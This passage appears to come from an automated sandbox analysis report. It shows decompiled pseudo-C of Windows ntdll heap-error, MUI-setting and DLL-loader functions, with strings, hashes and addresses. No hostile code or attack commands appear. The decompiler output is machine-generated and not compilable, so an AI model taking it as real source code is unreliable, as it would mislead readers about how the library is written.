invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 2837edd44f0fadff7d78eaad9ff49175fde5a3ba5155a3a67864b5d61d21910e
Instruction ID: 9b8385b7eabed481f3a19551f6b7f70a18eeefcb85e7c6187b6927e185627e10
Opcode Fuzzy Hash: 2837edd44f0fadff7d78eaad9ff49175fde5a3ba5155a3a67864b5d61d21910e
Instruction Fuzzy Hash: 3B812775A40210FFDF255A4ACC89DBBBF25EF56B55F400098F9061F116D3B29491CB72

Uniqueness

Uniqueness Score: -1.00%

Function 01781C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01781C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E016CB150();
				} else {
					E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x17b589c);
				E016CB150("Heap error detected at %p (heap handle %p)\n",  *0x17b58a0);
				_t27 =  *0x17b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01781E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E016CB150();
				} else {
					E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E016CB150("Error code: %d - %s\n",  *0x17b5898);
				_t113 =  *0x17b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016CB150();
					} else {
						E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016CB150("Parameter1: %p\n",  *0x17b58a4);
				}
				_t115 =  *0x17b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016CB150();
					} else {
						E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016CB150("Parameter2: %p\n",  *0x17b58a8);
				}
				_t117 =  *0x17b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016CB150();
					} else {
						E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016CB150("Parameter3: %p\n",  *0x17b58ac);
				}
				_t119 =  *0x17b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E016CB150();
					} else {
						E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17b58b4);
					E016CB150("Last known valid blocks: before - %p, after - %p\n",  *0x17b58b0);
				} else {
					_t120 =  *0x17b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E016CB150();
				} else {
					E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E016CB150("Stack trace available at %p\n", 0x17b58c0);
			}

0x01781c10
0x01781c16
0x01781c1e
0x01781c3d
0x01781c3e
0x01781c20
0x01781c35
0x01781c3a
0x01781c44
0x01781c55
0x01781c5a
0x01781c65
0x01781c67
0x00000000
0x01781c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01781c67
0x01781cdc
0x01781ce5
0x01781d04
0x01781d05
0x01781ce7
0x01781cfc
0x01781d01
0x01781d0b
0x01781d17
0x01781d1f
0x01781d25
0x01781d30
0x01781d4f
0x01781d50
0x01781d32
0x01781d47
0x01781d4c
0x01781d61
0x01781d67
0x01781d68
0x01781d6e
0x01781d79
0x01781d98
0x01781d99
0x01781d7b
0x01781d90
0x01781d95
0x01781daa
0x01781db0
0x01781db1
0x01781db7
0x01781dc2
0x01781de1
0x01781de2
0x01781dc4
0x01781dd9
0x01781dde
0x01781df3
0x01781df9
0x01781dfa
0x01781e00
0x01781e0a
0x01781e13
0x01781e32
0x01781e33
0x01781e15
0x01781e2a
0x01781e2f
0x01781e39
0x01781e4a
0x01781e02
0x01781e02
0x01781e08
0x00000000
0x00000000
0x01781e08
0x01781e5b
0x01781e7a
0x01781e7b
0x01781e5d
0x01781e72
0x01781e77
0x01781e95

Strings

Error code: %d - %s, xrefs: 01781D12
heap_failure_buffer_overrun, xrefs: 01781C98
heap_failure_entry_corruption, xrefs: 01781C83
Parameter3: %p, xrefs: 01781DEE
Stack trace available at %p, xrefs: 01781E86
heap_failure_invalid_argument, xrefs: 01781CAD
heap_failure_usage_after_free, xrefs: 01781CBB
heap_failure_invalid_allocation_type, xrefs: 01781CB4
heap_failure_generic, xrefs: 01781C7C
heap_failure_cross_heap_operation, xrefs: 01781CC2
heap_failure_lfh_bitmap_mismatch, xrefs: 01781CD7
heap_failure_freelists_corruption, xrefs: 01781CC9
heap_failure_buffer_underrun, xrefs: 01781C9F
Parameter2: %p, xrefs: 01781DA5
heap_failure_virtual_block_corruption, xrefs: 01781C91
HEAP: , xrefs: 01781C16, 01781C3D, 01781D04, 01781D4F, 01781D98, 01781DE1, 01781E32, 01781E7A
heap_failure_block_not_busy, xrefs: 01781CA6
heap_failure_multiple_entries_corruption, xrefs: 01781C8A
HEAP[%wZ]: , xrefs: 01781C30, 01781CF7, 01781D42, 01781D8B, 01781DD4, 01781E25, 01781E6D
heap_failure_listentry_corruption, xrefs: 01781CD0
heap_failure_unknown, xrefs: 01781C75
Parameter1: %p, xrefs: 01781D5C
heap_failure_internal, xrefs: 01781C6E
Last known valid blocks: before - %p, after - %p, xrefs: 01781E45
Heap error detected at %p (heap handle %p), xrefs: 01781C50

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: c4c0222f342206777c2621ce81293d88ad581ac13c5e52d2ea5869886a7233b2
Instruction ID: 58df7f9fa00637b6277cec6f9b21fe87e93498c83e7f797830e39f513a3a6903
Opcode Fuzzy Hash: c4c0222f342206777c2621ce81293d88ad581ac13c5e52d2ea5869886a7233b2
Instruction Fuzzy Hash: 4161D333591145DFD221BF89DCC9EB1B3A9EB04D71B8980AEF90B5B701D6359C828B1E

Uniqueness

Uniqueness Score: -1.00%

Function 016D3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E016D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E016D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E016D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E016D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E016D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E016D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L016E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0170F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01711370(_t276, 0x16a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0170BB40(0,  &_v68, _t170);
									if(L016D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0170BB40(_t257,  &_v68, _t243);
								if(L016D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01711370(_t278, 0x16a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L016E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0170F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01711370(_v16, 0x16a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0170BB40(_t262,  &_v68, _t244);
								if(L016D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01711370(_t282, 0x16a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0170BB40(_t262,  &_v68, _t201);
							if(L016D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L016E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0170F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01711370(_t280, 0x16a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0170BB40(_t267,  &_v68, _t245);
							if(L016D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01711370(_t284, 0x16a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0170BB40(_t267,  &_v68, _t224);
						if(L016D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x016d3d3c
0x016d3d42
0x016d3d44
0x016d3d46
0x016d3d49
0x016d3d4c
0x016d3d4f
0x016d3d52
0x016d3d55
0x016d3d58
0x016d3d5b
0x016d3d5f
0x016d3d61
0x016d3d66
0x01728213
0x01728218
0x016d4085
0x016d4088
0x016d408e
0x016d4094
0x016d409a
0x016d40a0
0x016d40a6
0x016d40a9
0x016d40af
0x016d40b6
0x016d40bd
0x016d40bd
0x016d3d83
0x0172821f
0x01728229
0x01728238
0x01728238
0x0172823d
0x0172823d
0x016d3da0
0x016d3daf
0x016d3db5
0x016d3dba
0x016d3dba
0x016d3dd4
0x016d3e94
0x016d3eab
0x016d3f6d
0x016d3f84
0x016d406b
0x016d406b
0x016d406e
0x016d406e
0x016d4070
0x016d4074
0x01728351
0x01728351
0x016d407a
0x016d407f
0x0172835d
0x01728370
0x01728377
0x01728379
0x0172837c
0x0172837c
0x0172835d
0x00000000
0x016d407f
0x016d3f8a
0x016d3f8d
0x016d3f90
0x016d3f95
0x0172830d
0x0172830f
0x016d3f9b
0x016d3fac
0x016d3fae
0x016d3fb1
0x016d3fb1
0x016d3fb6
0x01728317
0x0172831a
0x00000000
0x016d3fbc
0x016d3fc1
0x016d3fc9
0x016d3fd7
0x016d3fda
0x016d3fdd
0x016d4021
0x016d4021
0x016d4029
0x016d4030
0x016d4044
0x016d4046
0x016d4046
0x016d4044
0x016d4049
0x01728327
0x01728334
0x01728339
0x0172833c
0x016d404f
0x016d404f
0x016d404f
0x016d4051
0x016d4056
0x016d4063
0x016d4063
0x016d4068
0x00000000
0x016d4068
0x016d3fdf
0x016d3fe2
0x016d3fe4
0x016d3fe7
0x016d3fef
0x016d4003
0x016d4005
0x016d4005
0x016d400c
0x016d4013
0x016d4016
0x016d4017
0x016d401b
0x016d401e
0x00000000
0x016d401e
0x016d3fb6
0x016d3eb1
0x016d3eb4
0x016d3eb7
0x016d3ebc
0x017282a9
0x017282ab
0x016d3ec2
0x016d3ed3
0x016d3ed5
0x016d3ed8
0x016d3ed8
0x016d3edd
0x017282b3
0x017282b6
0x00000000
0x016d3ee3
0x016d3ee8
0x016d3eed
0x016d3ef0
0x016d3ef3
0x016d3f02
0x016d3f05
0x016d3f08
0x017282c0
0x017282c3
0x017282c5
0x017282c8
0x017282d0
0x017282e4
0x017282e6
0x017282e6
0x017282ed
0x017282f4
0x017282f7
0x017282f8
0x017282fc
0x017282ff
0x017282ff
0x016d3f0e
0x016d3f11
0x016d3f16
0x016d3f1d
0x016d3f31
0x01728307
0x01728307
0x016d3f31
0x016d3f39
0x016d3f48
0x016d3f4d
0x016d3f50
0x016d3f50
0x016d3f53
0x016d3f58
0x016d3f65
0x016d3f65
0x016d3f6a
0x00000000
0x016d3f6a
0x016d3edd
0x016d3dda
0x016d3ddd
0x016d3de0
0x016d3de5
0x01728245
0x016d3deb
0x016d3df7
0x016d3dfc
0x016d3dfe
0x016d3e01
0x016d3e01
0x016d3e06
0x0172824d
0x0172824f
0x01728254
0x00000000
0x016d3e0c
0x016d3e11
0x016d3e16
0x016d3e19
0x016d3e29
0x016d3e2c
0x016d3e2f
0x0172825c
0x0172825f
0x01728261
0x01728264
0x0172826c
0x01728280
0x01728282
0x01728282
0x01728289
0x01728290
0x01728293
0x01728294
0x01728298
0x0172829b
0x0172829b
0x016d3e35
0x016d3e38
0x016d3e3d
0x016d3e44
0x016d3e58
0x017282a3
0x017282a3
0x016d3e58
0x016d3e60
0x016d3e6f
0x016d3e74
0x016d3e77
0x016d3e77
0x016d3e7a
0x016d3e7f
0x016d3e8c
0x016d3e8c
0x016d3e91
0x00000000
0x016d3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 016D3E97
Kernel-MUI-Language-SKU, xrefs: 016D3F70
WindowsExcludedProcs, xrefs: 016D3D6F
Kernel-MUI-Language-Allowed, xrefs: 016D3DC0
Kernel-MUI-Number-Allowed, xrefs: 016D3D8C

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 39084d7aede0425b356f3b58c6837de01c2f137d9351789d221490fb60ecefae
Instruction ID: 7bac2b7db803857c0b151c9be871678d08ff8e41f336b76cf6fbbe1db59f05c4
Opcode Fuzzy Hash: 39084d7aede0425b356f3b58c6837de01c2f137d9351789d221490fb60ecefae
Instruction Fuzzy Hash: FDF14B72D01629EBCB11DF98CD80AEEFBF9FF08650F15016AE505A7251DB719E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 016C40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E016C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E016CB150();
					} else {
						E016CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E016CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E016CB150(", passed to %s", _t29);
					}
					_push("\n");
					E016CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x17b6378 = 1;
						asm("int3");
						 *0x17b6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x016c40e6
0x016c40e8
0x016c40f1
0x0172042d
0x0172044c
0x01720451
0x0172042f
0x01720444
0x01720449
0x0172045d
0x01720466
0x0172046e
0x01720474
0x01720475
0x0172047a
0x0172048a
0x0172048c
0x01720493
0x01720494
0x01720494
0x00000000
0x0172049b
0x00000000

Strings

HEAP: , xrefs: 0172044C
RtlAllocateHeap, xrefs: 01720468
Invalid heap signature for heap at %p, xrefs: 01720458
HEAP[%wZ]: , xrefs: 0172043F
, passed to %s, xrefs: 01720469

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 1d8f30e75f63ddde3389a09935d20a6db8ec1d22f25f849680c423137b96f8d3
Instruction ID: ca3f8b86c98cf9ea2aabaac20b23b5e064097065053e7e42dd98faeff5e91606
Opcode Fuzzy Hash: 1d8f30e75f63ddde3389a09935d20a6db8ec1d22f25f849680c423137b96f8d3
Instruction Fuzzy Hash: A7014C322012519EE3259769EC5EFB2BBA8DB42F71F1CC06DF10747A81CBA49845C638

Uniqueness

Uniqueness Score: -1.00%

Function 016F8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E016F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x17bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x17b8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x17b5780 & 0x00000003) != 0) {
							E01745510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x17b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0170B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x17b7984; // 0x1262b80
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x17b8464; // 0x73b80110
					 *0x17bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E016F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x17b5780 & 0x00000005) != 0) {
						_push(_t49);
						E01745510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x016f8e0f
0x016f8e16
0x016f8e19
0x016f8e1b
0x016f8e21
0x016f8e7f
0x016f8e85
0x01739354
0x0173936c
0x01739371
0x0173937b
0x01739381
0x01739381
0x0173937b
0x016f8e9d
0x016f8e9d
0x016f8e29
0x016f8e2c
0x016f8e38
0x016f8e3e
0x016f8e43
0x016f8eb5
0x016f8eb9
0x017392aa
0x017392af
0x017392e8
0x017392e8
0x017392af
0x016f8eb9
0x016f8e45
0x016f8e53
0x016f8e5b
0x016f8e5f
0x016f8e78
0x016f8e78
0x016f8e7d
0x016f8ec3
0x016f8ecd
0x016f8ed2
0x016f8ed2
0x016f8ec5
0x016f8ec5
0x00000000
0x016f8e7d
0x016f8e67
0x016f8ea4
0x0173931a
0x00000000
0x00000000
0x01739320
0x016f8ea4
0x016f8e70
0x01739325
0x01739340
0x01739345
0x01739345
0x016f8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0173932A
LdrpFindDllActivationContext, xrefs: 01739331, 0173935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01739357
minkernel\ntdll\ldrsnap.c, xrefs: 0173933B, 01739367

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: cae514af46ff3b78148995e28ad3d3ea21cf204145ddccd71053fd316a8f3de0
Instruction ID: 9f94f000cf20f9e8b0cb2a919ac1737c0e5f7c34a77ff8a02d1614909c61eedc
Opcode Fuzzy Hash: cae514af46ff3b78148995e28ad3d3ea21cf204145ddccd71053fd316a8f3de0
Instruction Fuzzy Hash: D6411A32A003159FDB36AE1CCC8DB79BAADBB41358F0681EDEB5557252E7705D808781

Uniqueness

Uniqueness Score: -1.00%

Function 017849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01784A4A, 01784A5D, 01784A5F, 01784AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01784A61
This is located in the %s field of the heap header., xrefs: 01784AD6
HEAP[%wZ]: , xrefs: 01784A3D, 01784AB7

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: c430c10cf353e8242ee6e94ba99dafca8bc8ae3abd6a64a25985a5c1869fe23b
Instruction ID: 32abc0947d1b6a849b3fa6dd114f6d159d1509bc3ba4d8315560c3cdf165f1b1
Opcode Fuzzy Hash: c430c10cf353e8242ee6e94ba99dafca8bc8ae3abd6a64a25985a5c1869fe23b
Instruction Fuzzy Hash: DB311431240212EFD321EB59CC89F67F7E9EF04A61F194099F9078F251D6B0AA44CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 016D8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E016D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
